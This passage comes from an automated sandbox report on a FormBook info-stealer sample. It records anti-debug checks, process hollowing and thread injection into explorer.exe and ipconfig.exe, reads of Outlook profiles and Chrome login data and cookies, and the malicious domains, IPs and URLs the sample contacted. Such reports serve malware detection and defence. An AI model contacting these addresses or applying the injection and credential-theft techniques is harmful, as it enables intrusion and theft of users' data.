Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A22D8A mov eax, dword ptr fs:[00000030h] 3_2_00A22D8A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 mov eax, dword ptr fs:[00000030h] 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A5FD9B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00AEFDE2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AD8DF1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h] 3_2_00AA6DC9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h] 3_2_00A5F527
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h] 3_2_00A5F527
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h] 3_2_00A5F527
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A2AD30
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h] 3_2_00A33D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEE539 mov eax, dword ptr fs:[00000030h] 3_2_00AEE539
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AF8D34
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h] 3_2_00AAA537
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h] 3_2_00A54D3B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h] 3_2_00A4C577
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h] 3_2_00A63D43
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h] 3_2_00AA3540
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD3D40 mov eax, dword ptr fs:[00000030h] 3_2_00AD3D40
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h] 3_2_00A47D50
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AF0EA5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h] 3_2_00AA46A7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h] 3_2_00ABFE87
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h] 3_2_00A376E2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A516E0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A68EC7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h] 3_2_00A536CC
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00ADFEC0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AF8ED6
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h] 3_2_00A2E620
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h] 3_2_00ADFE3F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h] 3_2_00A2C600
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h] 3_2_00A58E00
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h] 3_2_00AE1608
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h] 3_2_00A5A61C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h] 3_2_00A5A61C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h] 3_2_00A3766D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A4AE73
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h] 3_2_00A37E41
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h] 3_2_00AEAE44
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h] 3_2_00AEAE44
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h] 3_2_00A38794
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h] 3_2_00AA7794
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h] 3_2_00A637F5
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h] 3_2_00A24F2E
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h] 3_2_00A24F2E
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h] 3_2_00A5E730
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B73D mov eax, dword ptr fs:[00000030h] 3_2_00A4B73D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B73D mov eax, dword ptr fs:[00000030h] 3_2_00A4B73D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h] 3_2_00AF070D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h] 3_2_00AF070D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h] 3_2_00A5A70E
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h] 3_2_00A5A70E
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h] 3_2_00A4F716
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h] 3_2_00ABFF10
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h] 3_2_00ABFF10
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h] 3_2_00A3FF60
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h] 3_2_00AF8F6A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h] 3_2_00A3EF40
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0040C3E7 LdrLoadDll, 3_2_0040C3E7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040AB3E SetUnhandledExceptionFilter, 1_2_0040AB3E
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A9DF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040AE0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040AE0C
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040F730 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040F730

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.fedefarmatour.online
Source: C:\Windows\explorer.exe Domain query: www.a8-group.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.143.200 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.t4yfrance.com
Source: C:\Windows\explorer.exe Domain query: www.inhomeyoga.com
Source: C:\Windows\explorer.exe Network Connect: 195.110.124.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 194.58.112.174 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 81.88.48.71 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 210000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\iscan.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c Jump to behavior
Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.311230445.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.328795105.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301814210.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.257028572.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040AC4B cpuid 1_2_0040AC4B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040A8C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040A8C8
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756343 Sample: PrWP76ejHO.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 59 Multi AV Scanner detection for domain / URL 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for URL or domain 2->63 65 3 other signatures 2->65 10 PrWP76ejHO.exe 19 2->10         started        process3 file4 41 C:\Users\user\AppData\Local\Temp\iscan.exe, PE32 10->41 dropped 13 iscan.exe 1 3 10->13         started        process5 file6 43 C:\Users\user\AppData\Roaming\...\iijhlev.exe, PE32 13->43 dropped 83 Multi AV Scanner detection for dropped file 13->83 85 Machine Learning detection for dropped file 13->85 87 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->87 89 Maps a DLL or memory area into another process 13->89 17 iscan.exe 13->17         started        20 conhost.exe 13->20         started        signatures7 process8 signatures9 51 Modifies the context of a thread in another process (thread injection) 17->51 53 Maps a DLL or memory area into another process 17->53 55 Sample uses process hollowing technique 17->55 57 Queues an APC in another process (thread injection) 17->57 22 explorer.exe 17->22 injected process10 dnsIp11 45 t4yfrance.com 50.87.143.200, 49715, 49716, 49717 UNIFIEDLAYER-AS-1US United States 22->45 47 inhomeyoga.com 195.110.124.133, 49710, 80 REGISTER-ASIT Italy 22->47 49 5 other IPs or domains 22->49 67 System process connects to network (likely due to code injection or exploit) 22->67 69 Uses ipconfig to lookup or modify the Windows network settings 22->69 26 ipconfig.exe 13 22->26         started        29 iijhlev.exe 1 22->29         started        31 iijhlev.exe 1 22->31         started        signatures12 process13 signatures14 71 Tries to steal Mail credentials (via file / registry access) 26->71 73 Tries to harvest and steal browser information (history, passwords, etc) 26->73 75 Modifies the context of a thread in another process (thread injection) 26->75 77 Maps a DLL or memory area into another process 26->77 79 Multi AV Scanner detection for dropped file 29->79 81 Machine Learning detection for dropped file 29->81 33 WerFault.exe 10 29->33         started        35 conhost.exe 29->35         started        37 WerFault.exe 4 10 31->37         started        39 conhost.exe 31->39         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.110.124.133
 inhomeyoga.com Italy
39729 REGISTER-ASIT true
50.87.143.200
 t4yfrance.com United States
46606 UNIFIEDLAYER-AS-1US true
194.58.112.174
 www.a8-group.com Russian Federation
197695 AS-REGRU true
81.88.48.71
 fedefarmatour.online Italy
39729 REGISTER-ASIT true

Contacted Domains

Name IP Active
inhomeyoga.com 195.110.124.133 true
t4yfrance.com 50.87.143.200 true
www.a8-group.com 194.58.112.174 true
fedefarmatour.online 81.88.48.71 true
www.fedefarmatour.online unknown unknown
www.t4yfrance.com unknown unknown
www.inhomeyoga.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.fedefarmatour.online/dwdp/ true
  • Avira URL Cloud: malware
 unknown
http://www.t4yfrance.com/dwdp/ true
  • Avira URL Cloud: malware
 unknown
www.fedefarmatour.online/dwdp/ true
  • Avira URL Cloud: malware
 low
http://www.a8-group.com/dwdp/ true
  • Avira URL Cloud: malware
 unknown